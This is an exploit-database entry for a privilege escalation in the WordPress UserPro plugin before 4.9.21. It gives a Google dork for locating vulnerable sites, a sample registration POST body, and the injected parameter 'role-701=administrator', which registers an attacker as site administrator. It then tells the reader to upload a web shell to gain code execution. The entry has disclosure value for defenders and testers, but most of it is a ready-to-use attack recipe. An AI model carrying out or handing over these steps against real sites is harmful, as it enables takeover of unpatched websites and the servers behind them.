ExploitFixes
Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation 2019-01-07 18:05:04

# Exploit Title: Wordpress Plugin UserPro &lt; 4.9.21 User Registration With Administrator Role
# Google Dork: inurl:/wp-content/plugins/userpro/
# Date: 3rd January, 2019
# Exploit Author: Noman Riffat
# Vendor Homepage: https://userproplugin.com/
# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681
# Version: &lt; 4.9.21
# Tested on: Wordpress 4.9.9 with linux but should work on all WP versions and OS as well

UserPro fixed a user registration with administrator privileges vulnerability in version 4.9.21
But there wasn't any POC available so this exploit demonstrates this
vulnerability.
https://demo.userproplugin.com/wp-content/plugins/userpro/changelog.txt
From the changelog: &quot;Security Fix : Registration role validation fix&quot;

The latest version up to now is 4.9.29
The vulnerability allows anyone to register with Administrator role which
can easily be turned into RCE

Steps to reproduce:

1. Go to the registration form, input random fake values, trigger Burp
Suite and click submit.

2. The POST data will look similar to following

redirect_uri-701=&amp;_myuserpro_nonce=xxxxxx&amp;_wp_http_referer=/&amp;unique_id=701&amp;user_login-701=USERNAME&amp;user_email-701=
[email protected]
&amp;user_pass-701=PASSWORD&amp;user_pass_confirm-701=PASSWORD&amp;display_name-701=&amp;profilepicture-701=&amp;country-701=&amp;facebook-701=&amp;twitter-701=&amp;google_plus-701=&amp;user_url-701=&amp;terms=on&amp;action=userpro_process_form&amp;template=register&amp;group=default&amp;shortcode=xxxxxxxxxxxxxxxxxxxxxxxxxxx

Here &quot;-701&quot; is a random postfix number and gets stripped at the server.
Other than that, the interesting values are

user_login
user_email
user_pass
user_pass_confirm

3. Adding following extra parameter in POST data will register the user
with Administrator privileges

role-701=administrator

So the modified POST data will look similar to following

role-701=administrator&amp;redirect_uri-701=&amp;_myuserpro_nonce=xxxxxx&amp;....snip....snip....

4. Forward the POST data in Burp Suite and you will get redirect to
/profile/ page with Administrator menu on top. Access /wp-admin/ to get to
the dashboard

5. Upload shell with default methods

@nomanriffat